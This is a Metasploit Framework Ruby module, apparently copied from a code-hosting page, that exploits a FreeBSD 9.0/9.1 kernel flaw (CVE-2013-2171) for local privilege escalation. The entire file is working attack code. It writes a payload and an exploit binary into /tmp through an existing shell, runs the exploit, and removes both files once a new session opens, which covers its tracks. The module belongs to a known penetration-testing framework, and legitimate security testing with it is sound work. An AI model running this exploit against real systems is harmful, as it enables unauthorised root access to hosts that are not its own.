112 lines
3.1 KiB
Ruby
112 lines
3.1 KiB
Ruby
|
##
|
||
|
|
# This file is part of the Metasploit Framework and may be subject to
|
||
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
||
|
|
# web site for more information on licensing and terms of use.
|
||
|
|
# http://metasploit.com/
|
||
|
|
##
|
||
|
|
|
||
|
|
require 'msf/core'
|
||
|
|
|
||
|
|
class Metasploit4 < Msf::Exploit::Local
|
||
|
|
Rank = GreatRanking
|
||
|
|
|
||
|
|
include Msf::Exploit::EXE
|
||
|
|
include Msf::Post::Common
|
||
|
|
|
||
|
|
def initialize(info={})
|
||
|
|
super( update_info( info, {
|
||
|
|
'Name' => 'FreeBSD 9 Address Space Manipulation Privilege Escalation',
|
||
|
|
'Description' => %q{
|
||
|
|
This module exploits a vulnerability that can be used to modify portions of
|
||
|
|
a process's address space, which may lead to privilege escalation. Systems
|
||
|
|
such as FreeBSD 9.0 and 9.1 are known to be vulnerable.
|
||
|
|
},
|
||
|
|
'License' => MSF_LICENSE,
|
||
|
|
'Author' =>
|
||
|
|
[
|
||
|
|
'Konstantin Belousov', # Discovery
|
||
|
|
'Alan Cox', # Discovery
|
||
|
|
'Hunger', # POC
|
||
|
|
'sinn3r' # Metasploit
|
||
|
|
],
|
||
|
|
'Platform' => [ 'bsd' ],
|
||
|
|
'Arch' => [ ARCH_X86 ],
|
||
|
|
'SessionTypes' => [ 'shell' ],
|
||
|
|
'References' =>
|
||
|
|
[
|
||
|
|
[ 'CVE', '2013-2171' ],
|
||
|
|
[ 'OSVDB', '94414' ],
|
||
|
|
[ 'EDB', '26368' ],
|
||
|
|
[ 'BID', '60615' ],
|
||
|
|
[ 'URL', 'http://www.freebsd.org/security/advisories/FreeBSD-SA-13:06.mmap.asc' ]
|
||
|
|
],
|
||
|
|
'Targets' =>
|
||
|
|
[
|
||
|
|
[ 'FreeBSD x86', {} ]
|
||
|
|
],
|
||
|
|
'DefaultTarget' => 0,
|
||
|
|
'DisclosureDate' => "Jun 18 2013",
|
||
|
|
}
|
||
|
|
))
|
||
|
|
end
|
||
|
|
|
||
|
|
def write_file(data, fname)
|
||
|
|
oct_data = "\\" + data.unpack("C*").collect {|e| e.to_s(8)} * "\\"
|
||
|
|
session.shell_command_token("printf \"#{oct_data}\" > #{fname}")
|
||
|
|
session.shell_command_token("chmod +x #{fname}")
|
||
|
|
|
||
|
|
chk = session.shell_command_token("file #{fname}")
|
||
|
|
return (chk =~ /ERROR: cannot open/) ? false : true
|
||
|
|
end
|
||
|
|
|
||
|
|
def upload_payload
|
||
|
|
fname = "/tmp/#{Rex::Text.rand_text_alpha(4)}"
|
||
|
|
p = generate_payload_exe
|
||
|
|
f = write_file(p, fname)
|
||
|
|
return nil if not f
|
||
|
|
fname
|
||
|
|
end
|
||
|
|
|
||
|
|
def generate_exploit(payload_fname)
|
||
|
|
#
|
||
|
|
# Metasm does not support FreeBSD executable generation.
|
||
|
|
#
|
||
|
|
path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-2171.bin")
|
||
|
|
f = File.open(path, 'rb')
|
||
|
|
x = f.read(f.stat.size)
|
||
|
|
f.close
|
||
|
|
|
||
|
|
x.gsub(/W00T/, File.basename(payload_fname))
|
||
|
|
end
|
||
|
|
|
||
|
|
def upload_exploit(payload_fname)
|
||
|
|
fname = "/tmp/#{Rex::Text.rand_text_alpha(5)}"
|
||
|
|
bin = generate_exploit(payload_fname)
|
||
|
|
f = write_file(bin, fname)
|
||
|
|
return nil if not f
|
||
|
|
fname
|
||
|
|
end
|
||
|
|
|
||
|
|
def on_new_session(cli)
|
||
|
|
print_warning("Removing #{@payload_fname}")
|
||
|
|
cli.shell_command_token("rm #{@payload_fname}")
|
||
|
|
|
||
|
|
print_warning("Removing #{@exploit_fname}")
|
||
|
|
cli.shell_command_token("rm #{@exploit_fname}")
|
||
|
|
end
|
||
|
|
|
||
|
|
def exploit
|
||
|
|
@payload_fname = upload_payload
|
||
|
|
fail_with(Exploit::Failure::NotFound, "Payload failed to upload") if @payload_fname.nil?
|
||
|
|
print_status("Payload #{@payload_fname} uploaded.")
|
||
|
|
|
||
|
|
@exploit_fname = upload_exploit(@payload_fname)
|
||
|
|
fail_with(Exploit::Failure::NotFound, "Exploit failed to upload") if @exploit_fname.nil?
|
||
|
|
print_status("Exploit #{@exploit_fname} uploaded.")
|
||
|
|
|
||
|
|
print_status("Executing #{@exploit_fname}")
|
||
|
|
cmd_exec(@exploit_fname)
|
||
|
|
end
|
||
|
|
|
||
|
|
end
|